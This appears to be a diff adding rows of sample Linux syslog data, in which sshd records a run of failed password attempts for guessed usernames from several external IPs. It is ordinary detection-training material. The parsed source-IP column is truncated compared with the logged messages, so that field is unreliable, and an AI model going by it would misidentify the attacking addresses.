+11046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:10,UbuntuDevEnv,2019-06-26 00:03:10,auth,UbuntuDevEnv,info,Invalid user Rupesh from 88.247.110.88 port 37310,67085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Rupesh,88.247.110.8,37310,,
+11047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:10,UbuntuDevEnv,2019-06-26 00:03:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:10,UbuntuDevEnv,2019-06-26 00:03:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,67085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:10,UbuntuDevEnv,2019-06-26 00:03:10,auth,UbuntuDevEnv,info,Failed password for invalid user git from 114.112.81.180 port 59940 ssh2,67074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,114.112.81.1,59940,,
+11050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:10,UbuntuDevEnv,2019-06-26 00:03:10,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 59940:11: Bye Bye [preauth],67074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,59940,,
+11051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:10,UbuntuDevEnv,2019-06-26 00:03:10,auth,UbuntuDevEnv,info,Disconnected from invalid user git 114.112.81.180 port 59940 [preauth],67074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,114.112.81.1,59940,,
+11052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:12,UbuntuDevEnv,2019-06-26 00:03:11,auth,UbuntuDevEnv,info,Failed password for invalid user Rupesh from 88.247.110.88 port 37310 ssh2,67085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Rupesh,88.247.110.8,37310,,
+11053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:12,UbuntuDevEnv,2019-06-26 00:03:12,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 37310:11: Bye Bye [preauth],67085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,37310,,
+11054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:12,UbuntuDevEnv,2019-06-26 00:03:12,auth,UbuntuDevEnv,info,Disconnected from invalid user Rupesh 88.247.110.88 port 37310 [preauth],67085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Rupesh,88.247.110.8,37310,,
+11055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:20,UbuntuDevEnv,2019-06-26 00:03:20,auth,UbuntuDevEnv,info,Invalid user image from 196.27.127.61 port 52602,67120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,image,196.27.127.6,52602,,
+11056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:20,UbuntuDevEnv,2019-06-26 00:03:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:20,UbuntuDevEnv,2019-06-26 00:03:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,67120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+11058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:22,UbuntuDevEnv,2019-06-26 00:03:22,auth,UbuntuDevEnv,info,Failed password for invalid user image from 196.27.127.61 port 52602 ssh2,67120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,image,196.27.127.6,52602,,
+11059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:23,UbuntuDevEnv,2019-06-26 00:03:22,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 52602:11: Bye Bye [preauth],67120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,52602,,
+11060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:23,UbuntuDevEnv,2019-06-26 00:03:22,auth,UbuntuDevEnv,info,Disconnected from invalid user image 196.27.127.61 port 52602 [preauth],67120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,image,196.27.127.6,52602,,
+11061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:44,UbuntuDevEnv,2019-06-26 00:03:43,auth,UbuntuDevEnv,info,Invalid user pul from 131.100.219.3 port 43074,67208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,131.100.219.3,43074,,
+11062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:44,UbuntuDevEnv,2019-06-26 00:03:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:44,UbuntuDevEnv,2019-06-26 00:03:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,67208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:46,UbuntuDevEnv,2019-06-26 00:03:46,auth,UbuntuDevEnv,info,Failed password for invalid user pul from 131.100.219.3 port 43074 ssh2,67208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,131.100.219.3,43074,,
+11065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:47,UbuntuDevEnv,2019-06-26 00:03:46,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 43074:11: Bye Bye [preauth],67208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,43074,,
+11066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:47,UbuntuDevEnv,2019-06-26 00:03:46,auth,UbuntuDevEnv,info,Disconnected from invalid user pul 131.100.219.3 port 43074 [preauth],67208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,131.100.219.3,43074,,
+11067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:56,UbuntuDevEnv,2019-06-26 00:03:55,auth,UbuntuDevEnv,info,Invalid user semik from 118.222.146.186 port 40426,67247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,118.222.146.1,40426,,
+11068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:56,UbuntuDevEnv,2019-06-26 00:03:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,67247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:56,UbuntuDevEnv,2019-06-26 00:03:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:58,UbuntuDevEnv,2019-06-26 00:03:58,auth,UbuntuDevEnv,info,Failed password for invalid user semik from 118.222.146.186 port 40426 ssh2,67247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,118.222.146.1,40426,,
+11071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:59,UbuntuDevEnv,2019-06-26 00:03:58,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 40426:11: Bye Bye [preauth],67247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,40426,,
+11072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:59,UbuntuDevEnv,2019-06-26 00:03:58,auth,UbuntuDevEnv,info,Disconnected from invalid user semik 118.222.146.186 port 40426 [preauth],67247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,118.222.146.1,40426,,
+11073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:48,UbuntuDevEnv,2019-06-26 00:04:48,auth,UbuntuDevEnv,info,Invalid user eden from 114.112.81.180 port 50634,67434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,114.112.81.1,50634,,
+11074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:48,UbuntuDevEnv,2019-06-26 00:04:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,67434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:48,UbuntuDevEnv,2019-06-26 00:04:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:50,UbuntuDevEnv,2019-06-26 00:04:50,auth,UbuntuDevEnv,info,Failed password for invalid user eden from 114.112.81.180 port 50634 ssh2,67434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,114.112.81.1,50634,,
+11077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:50,UbuntuDevEnv,2019-06-26 00:04:50,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 50634:11: Bye Bye [preauth],67434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,50634,,
+11078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:50,UbuntuDevEnv,2019-06-26 00:04:50,auth,UbuntuDevEnv,info,Disconnected from invalid user eden 114.112.81.180 port 50634 [preauth],67434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,114.112.81.1,50634,,
+11079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:55,UbuntuDevEnv,2019-06-26 00:04:54,auth,UbuntuDevEnv,info,Invalid user nan from 88.247.110.88 port 37765,67460,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nan,88.247.110.8,37765,,
+11080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:55,UbuntuDevEnv,2019-06-26 00:04:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,67460,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:55,UbuntuDevEnv,2019-06-26 00:04:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67460,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:56,UbuntuDevEnv,2019-06-26 00:04:56,auth,UbuntuDevEnv,info,Failed password for invalid user nan from 88.247.110.88 port 37765 ssh2,67460,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nan,88.247.110.8,37765,,
+11083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:56,UbuntuDevEnv,2019-06-26 00:04:56,auth,UbuntuDevEnv,info,Disconnected from invalid user nan 88.247.110.88 port 37765 [preauth],67460,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nan,88.247.110.8,37765,,
+11084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:04:56,UbuntuDevEnv,2019-06-26 00:04:56,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 37765:11: Bye Bye [preauth],67460,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,37765,,
+11085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:14,UbuntuDevEnv,2019-06-26 00:05:13,auth,UbuntuDevEnv,info,Invalid user hadoop from 196.27.127.61 port 60923,67530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,196.27.127.6,60923,,
+11086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:14,UbuntuDevEnv,2019-06-26 00:05:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,67530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+11087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:14,UbuntuDevEnv,2019-06-26 00:05:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:16,UbuntuDevEnv,2019-06-26 00:05:15,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 196.27.127.61 port 60923 ssh2,67530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,196.27.127.6,60923,,
+11089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:16,UbuntuDevEnv,2019-06-26 00:05:15,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 60923:11: Bye Bye [preauth],67530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,60923,,
+11090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:16,UbuntuDevEnv,2019-06-26 00:05:15,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 196.27.127.61 port 60923 [preauth],67530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,196.27.127.6,60923,,
+11091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:22,UbuntuDevEnv,2019-06-26 00:05:21,auth,UbuntuDevEnv,info,Invalid user mega from 186.31.116.78 port 36732,67561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mega,186.31.116.7,36732,,
+11092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:22,UbuntuDevEnv,2019-06-26 00:05:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,67561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:22,UbuntuDevEnv,2019-06-26 00:05:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:23,UbuntuDevEnv,2019-06-26 00:05:22,auth,UbuntuDevEnv,info,Failed password for invalid user mega from 186.31.116.78 port 36732 ssh2,67561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mega,186.31.116.7,36732,,
+11095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:23,UbuntuDevEnv,2019-06-26 00:05:23,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 36732:11: Bye Bye [preauth],67561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,36732,,
+11096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:23,UbuntuDevEnv,2019-06-26 00:05:23,auth,UbuntuDevEnv,info,Disconnected from invalid user mega 186.31.116.78 port 36732 [preauth],67561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mega,186.31.116.7,36732,,
+11097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:31,UbuntuDevEnv,2019-06-26 00:05:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186  user=test,67592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,118.222.146.1,,0,
+11098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:33,UbuntuDevEnv,2019-06-26 00:05:33,auth,UbuntuDevEnv,info,Failed password for test from 118.222.146.186 port 57186 ssh2,67592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,57186,,
+11099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:34,UbuntuDevEnv,2019-06-26 00:05:33,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 118.222.146.186 port 57186 [preauth],67592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,118.222.146.1,57186,,
+11100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:05:34,UbuntuDevEnv,2019-06-26 00:05:33,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 57186:11: Bye Bye [preauth],67592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,57186,,
+11101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:00,UbuntuDevEnv,2019-06-26 00:05:59,auth,UbuntuDevEnv,info,Invalid user cyrus from 81.12.159.146 port 58572,67694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyrus,81.12.159.1,58572,,
+11102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:00,UbuntuDevEnv,2019-06-26 00:05:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:00,UbuntuDevEnv,2019-06-26 00:05:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.12.159.146,67694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.12.159.1,,0,
+11104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:02,UbuntuDevEnv,2019-06-26 00:06:01,auth,UbuntuDevEnv,info,Failed password for invalid user cyrus from 81.12.159.146 port 58572 ssh2,67694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyrus,81.12.159.1,58572,,
+11105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:02,UbuntuDevEnv,2019-06-26 00:06:01,auth,UbuntuDevEnv,info,Disconnected from invalid user cyrus 81.12.159.146 port 58572 [preauth],67694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyrus,81.12.159.1,58572,,
